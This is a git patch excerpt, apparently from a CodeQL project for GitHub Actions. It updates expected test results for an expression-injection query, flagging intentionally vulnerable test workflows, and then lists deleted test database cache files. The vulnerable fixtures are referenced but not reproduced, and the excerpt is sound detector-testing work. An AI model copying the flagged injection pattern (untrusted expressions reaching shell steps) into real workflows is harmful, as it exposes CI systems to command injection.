.github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | @@ -75,12 +90,30 @@ nodes | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | diff --git a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected index b21ac80574b..1ea054565bc 100644 --- a/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/ExpressionInjection.expected @@ -15,11 +15,26 @@ edges | .github/workflows/image_link_generator.yml:25:24:25:67 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | .github/workflows/issues.yaml:17:12:17:36 | echo '$ ... env }}' | | .github/workflows/issues.yaml:20:19:20:49 | ${{ git ... itle }} | .github/workflows/issues.yaml:18:12:18:37 | echo '$ ... env }}' | @@ -75,12 +90,30 @@ nodes | .github/workflows/image_link_generator.yml:28:9:35:6 | Run Step: trim-url [trimmed_url] | semmle.label | Run Step: trim-url [trimmed_url] | | .github/workflows/image_link_generator.yml:31:27:31:66 | ${{ ste ... _url }} | semmle.label | ${{ ste ... _url }} | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | semmle.label | \| | -| .github/workflows/inter-job.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | -| .github/workflows/inter-job.yml:8:19:8:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | -| .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | semmle.label | Uses Step: source | -| .github/workflows/inter-job.yml:19:9:27:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | -| .github/workflows/inter-job.yml:23:19:23:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job0.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job0.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job0.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job0.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job1.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job1.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job1.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job1.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job2.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job2.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job2.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job2.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | +| .github/workflows/inter-job4.yml:15:7:17:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | +| .github/workflows/inter-job4.yml:15:19:15:49 | ${{ ste ... alue }} | semmle.label | ${{ ste ... alue }} | +| .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | semmle.label | Uses Step: source | +| .github/workflows/inter-job4.yml:26:9:34:2 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | +| .github/workflows/inter-job4.yml:30:19:30:63 | ${{ ste ... iles }} | semmle.label | ${{ ste ... iles }} | +| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | semmle.label | echo ${ ... utput}} | | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | | .github/workflows/issues.yaml:10:16:10:46 | ${{ git ... itle }} | semmle.label | ${{ git ... itle }} | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | semmle.label | echo '$ ... tle }}' | @@ -176,7 +209,10 @@ subpaths | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | .github/workflows/gollum.yml:9:12:9:56 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | .github/workflows/gollum.yml:10:12:10:59 | echo '$ ... ame }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | .github/workflows/image_link_generator.yml:18:17:18:48 | ${{ git ... body }} | .github/workflows/image_link_generator.yml:36:14:37:126 | \| | Potential expression injection, which may be controlled by an external user. | -| .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | .github/workflows/inter-job.yml:15:9:19:6 | Uses Step: source | .github/workflows/inter-job.yml:36:14:36:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job0.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job0.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | .github/workflows/inter-job1.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job1.yml:43:14:43:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | .github/workflows/inter-job2.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job2.yml:45:14:45:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | +| .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | .github/workflows/inter-job4.yml:22:9:26:6 | Uses Step: source | .github/workflows/inter-job4.yml:44:14:44:52 | echo ${ ... utput}} | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | .github/workflows/issues.yaml:13:12:13:49 | echo '$ ... tle }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | .github/workflows/issues.yaml:14:12:14:48 | echo '$ ... ody }}' | Potential expression injection, which may be controlled by an external user. | | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | .github/workflows/issues.yaml:4:15:4:45 | ${{ git ... itle }} | .github/workflows/issues.yaml:15:12:15:39 | echo '$ ... env }}' | Potential expression injection, which may be controlled by an external user. | From c8e89797eb59f6c5c0e03626616a8806b6ce9cc3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 4 Mar 2024 15:43:38 +0100 Subject: [PATCH 0085/1267] remove test db --- db/baseline-info.json | 1 - db/codeql-database.yml | 10 - db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 40 -> 0 bytes .../pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 40 -> 0 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 8192 -> 0 bytes .../cached-strings/pools/0/indices1/info | Bin 40 -> 0 bytes .../pools/0/indices1/page-000000 | Bin 8192 -> 0 bytes .../default/cache/cached-strings/pools/0/info | Bin 41 -> 0 bytes .../cached-strings/pools/0/metadata/info | Bin 40 -> 0 bytes .../pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../cache/cached-strings/pools/poolInfo | Bin 28 -> 0 bytes .../cache/cached-strings/tuple-pool/header | Bin 4 -> 0 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 16 -> 0 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 216 -> 0 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 320 -> 0 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 216 -> 0 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 6312 -> 0 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 16 -> 0 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 12 -> 0 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 16 -> 0 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 12 -> 0 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 16 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 12 -> 0 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 24 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-0defa4a0 | Bin 16 -> 0 bytes ...king#f6f2598d--TaintFlow-0defa4a0#0#tttttt | Bin 3200 -> 0 bytes ...Tracking#f6f2598d--TaintFlow-0defa4a0#1#tt | Bin 896 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-5b92615f | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-5b92615f#0# | Bin 12 -> 0 bytes ...racking#f6f2598d--TaintFlow-5b92615f#1#ttt | Bin 152 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-6e089ab6 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-6e089ab6#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-a2a08e4a | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-a2a08e4a#0# | Bin 12 -> 0 bytes ...Tracking#f6f2598d--TaintFlow-a2a08e4a#1#tt | Bin 116 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-b0571e78 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-b0571e78#0# | Bin 12 -> 0 bytes ...tTracking#f6f2598d--TaintFlow-b0571e78#1#t | Bin 88 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-b18fe878 | Bin 16 -> 0 bytes ...tTracking#f6f2598d--TaintFlow-b18fe878#0#t | Bin 2216 -> 0 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 16 -> 0 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 12 -> 0 bytes ...ow---Cached--TAccessPathFront-12309985#1#t | Bin 104 -> 0 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 16 -> 0 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 12 -> 0 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 112 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 12 -> 0 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 112 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 12 -> 0 bytes ...---Cached--TApproxAccessPathF-baba9c49#1#t | Bin 104 -> 0 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 16 -> 0 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 12 -> 0 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 24 -> 0 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 16 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 12 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 12 -> 0 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 16 -> 0 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 12 -> 0 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 280 -> 0 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 16 -> 0 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 12 -> 0 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 16 -> 0 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 12 -> 0 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 16 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 12 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 12 -> 0 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 16 -> 0 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 16 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TContent | Bin 16 -> 0 bytes ...les#DataFlowPrivate#6a54d7ad--TContent#0#s | Bin 104 -> 0 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 16 -> 0 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 12 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 16 -> 0 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 2216 -> 0 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 16 -> 0 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 12 -> 0 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 16 -> 0 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 12 -> 0 bytes ...4d7ad--DataFlowType---TOption-4fb642c9#1#t | Bin 16 -> 0 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 16 -> 0 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 12 -> 0 bytes ...Unit#54592529--Unit---TOption-51176e26#1#t | Bin 16 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 16 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 12 -> 0 bytes db/db-yaml/default/cache/pages/01.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/01.pack.d | Bin 844 -> 0 bytes db/db-yaml/default/cache/pages/02.pack | Bin 79 -> 0 bytes db/db-yaml/default/cache/pages/08.pack | Bin 87 -> 0 bytes db/db-yaml/default/cache/pages/09.pack | Bin 167 -> 0 bytes db/db-yaml/default/cache/pages/09.pack.d | Bin 2341 -> 0 bytes db/db-yaml/default/cache/pages/0b.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/0b.pack.d | Bin 292 -> 0 bytes db/db-yaml/default/cache/pages/0d.pack | Bin 84 -> 0 bytes db/db-yaml/default/cache/pages/17.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/17.pack.d | Bin 5326 -> 0 bytes db/db-yaml/default/cache/pages/20.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/20.pack.d | Bin 574 -> 0 bytes db/db-yaml/default/cache/pages/24.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/24.pack.d | Bin 6318 -> 0 bytes db/db-yaml/default/cache/pages/26.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/26.pack.d | Bin 294 -> 0 bytes db/db-yaml/default/cache/pages/27.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/27.pack.d | Bin 1493 -> 0 bytes db/db-yaml/default/cache/pages/29.pack | Bin 84 -> 0 bytes db/db-yaml/default/cache/pages/2b.pack | Bin 84 -> 0 bytes db/db-yaml/default/cache/pages/2d.pack | Bin 91 -> 0 bytes db/db-yaml/default/cache/pages/33.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/33.pack.d | Bin 393 -> 0 bytes db/db-yaml/default/cache/pages/37.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/37.pack.d | Bin 106 -> 0 bytes db/db-yaml/default/cache/pages/3c.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/3c.pack.d | Bin 916 -> 0 bytes db/db-yaml/default/cache/pages/42.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/42.pack.d | Bin 5053 -> 0 bytes db/db-yaml/default/cache/pages/45.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/45.pack.d | Bin 6001 -> 0 bytes db/db-yaml/default/cache/pages/46.pack | Bin 111 -> 0 bytes db/db-yaml/default/cache/pages/4c.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/4c.pack.d | Bin 302 -> 0 bytes db/db-yaml/default/cache/pages/4d.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/4d.pack.d | Bin 3292 -> 0 bytes db/db-yaml/default/cache/pages/4e.pack | Bin 116 -> 0 bytes db/db-yaml/default/cache/pages/4e.pack.d | Bin 1048 -> 0 bytes db/db-yaml/default/cache/pages/54.pack | Bin 320 -> 0 bytes db/db-yaml/default/cache/pages/55.pack | Bin 91 -> 0 bytes db/db-yaml/default/cache/pages/5d.pack | Bin 221 -> 0 bytes db/db-yaml/default/cache/pages/62.pack | Bin 159 -> 0 bytes db/db-yaml/default/cache/pages/6a.pack | Bin 179 -> 0 bytes db/db-yaml/default/cache/pages/6f.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/6f.pack.d | Bin 1695 -> 0 bytes db/db-yaml/default/cache/pages/7a.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/7a.pack.d | Bin 1284 -> 0 bytes db/db-yaml/default/cache/pages/7b.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/7b.pack.d | Bin 151 -> 0 bytes db/db-yaml/default/cache/pages/84.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/84.pack.d | Bin 3788 -> 0 bytes db/db-yaml/default/cache/pages/88.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/88.pack.d | Bin 91 -> 0 bytes db/db-yaml/default/cache/pages/93.pack | Bin 113 -> 0 bytes db/db-yaml/default/cache/pages/96.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/96.pack.d | Bin 1651 -> 0 bytes db/db-yaml/default/cache/pages/9e.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/9e.pack.d | Bin 1899 -> 0 bytes db/db-yaml/default/cache/pages/a1.pack | Bin 111 -> 0 bytes db/db-yaml/default/cache/pages/a3.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/a3.pack.d | Bin 5502 -> 0 bytes db/db-yaml/default/cache/pages/aa.pack | Bin 65 -> 0 bytes db/db-yaml/default/cache/pages/aa.pack.d | 